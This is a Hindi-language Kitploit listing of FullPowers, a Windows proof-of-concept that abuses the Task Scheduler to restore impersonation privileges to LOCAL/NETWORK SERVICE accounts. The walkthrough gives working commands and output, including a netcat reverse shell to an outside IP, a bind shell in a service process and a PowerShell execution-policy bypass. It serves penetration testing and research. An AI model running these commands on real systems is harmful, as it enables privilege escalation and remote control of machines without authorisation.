Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FullPowers — किसी LOCAL/NETWORK SERVICE खाते के डिफ़ॉल्ट विशेषाधिकार सेट को पुनर्प्राप्त करें। | Kitploit
उपकरण/GitHubGitHub/itm4n/fullpowers
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubitm4n/fullpowers

FullPowers

किसी LOCAL/NETWORK SERVICE खाते के डिफ़ॉल्ट विशेषाधिकार सेट को पुनर्प्राप्त करें।

रिपॉजिटरी देखें
7001026 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

FullPowers

FullPowers एक प्रूफ-ऑफ-कॉन्सेप्ट टूल है जो मैंने सेवा खाते के डिफ़ॉल्ट विशेषाधिकार सेट को स्वचालित रूप से पुनर्प्राप्त करने के लिए बनाया है, जिसमें SeAssignPrimaryToken और SeImpersonate शामिल हैं।

तर्क

विंडोज़ पर, LOCAL SERVICE या NETWORK SERVICE के रूप में निष्पादित कुछ सेवाओं को विशेषाधिकारों के एक सीमित सेट के साथ चलाने के लिए कॉन्फ़िगर किया गया है। इसलिए, भले ही सेवा से समझौता किया गया हो, आपको स्वर्णिम प्रतिरूपण विशेषाधिकार नहीं मिलेंगे और LOCAL SYSTEM तक विशेषाधिकार वृद्धि अधिक जटिल होनी चाहिए। हालाँकि, मैंने पाया कि, जब आप एक निर्धारित कार्य बनाते हैं, तो टास्क शेड्यूलर सेवा द्वारा बनाई गई नई प्रक्रिया में संबंधित उपयोगकर्ता खाते के सभी डिफ़ॉल्ट विशेषाधिकार होते हैं (SeImpersonate को छोड़कर)। इसलिए, कुछ टोकन हेरफेर के साथ, आप सभी लुप्त विशेषाधिकारों के साथ एक नई प्रक्रिया उत्पन्न कर सकते हैं।

अधिक जानकारी के लिए: https://itm4n.github.io/localservice-privileges/

उपयोग

⚠️ यह टूल केवल LOCAL SERVICE या NETWORK SERVICE के रूप में निष्पादित किया जाना चाहिए।

आप -h विकल्प का उपयोग करके सहायता संदेश देख सकते हैं।

root@kitploit:~
c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

उदाहरण 1, मूल उपयोग

root@kitploit:~
c:\TOOLS>FullPowers
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

उदाहरण 2, एक कस्टम कमांड लाइन निर्दिष्ट करें

root@kitploit:~
c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Successfully created scheduled task. PID=9028
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

उदाहरण 3, नेटकैट रिवर्स शेल प्रारंभ करें और बाहर निकलें

root@kitploit:~
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Successfully created scheduled task. PID=5482
[+] CreateProcessAsUser() OK

कैसे करें

क्या आप स्वयं इस PoC का परीक्षण करना चाहते हैं? यह बहुत अच्छा है! आपको आरंभ करने के लिए यहां कुछ सरल निर्देश दिए गए हैं।

समग्र विचार एक मौजूदा सेवा की प्रक्रिया से बाइंडशेल शुरू करना, उससे कनेक्ट करना और फिर निष्पादन योग्य चलाना है।

  1. आपको 2 तृतीय-पक्ष टूल्स की आवश्यकता होगी, netcat और RunFromProcess।
  2. एक ऐसी सेवा चुनें जिसके पास सीमित विशेषाधिकार हों, जैसे: upnphost।
  3. टास्क मैनेजर खोलें, सेवाएँ टैब पर जाएं और संबंधित प्रक्रिया का PID प्राप्त करें।
  4. बाइंडशेल को एक व्यवस्थापक के रूप में प्रारंभ करने के लिए निम्न कमांड का उपयोग करें:
root@kitploit:~
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. बाइंडशेल से कनेक्ट करने के लिए निम्न कमांड का उपयोग करें:
root@kitploit:~
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. हम देख सकते हैं कि वर्तमान प्रक्रिया में कोई प्रतिरूपण विशेषाधिकार नहीं है। अब PoC चलाएं...
root@kitploit:~
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

अब आपके पास प्रतिरूपण विशेषाधिकारों वाला एक शेल होना चाहिए!

टूल डाउनलोड करें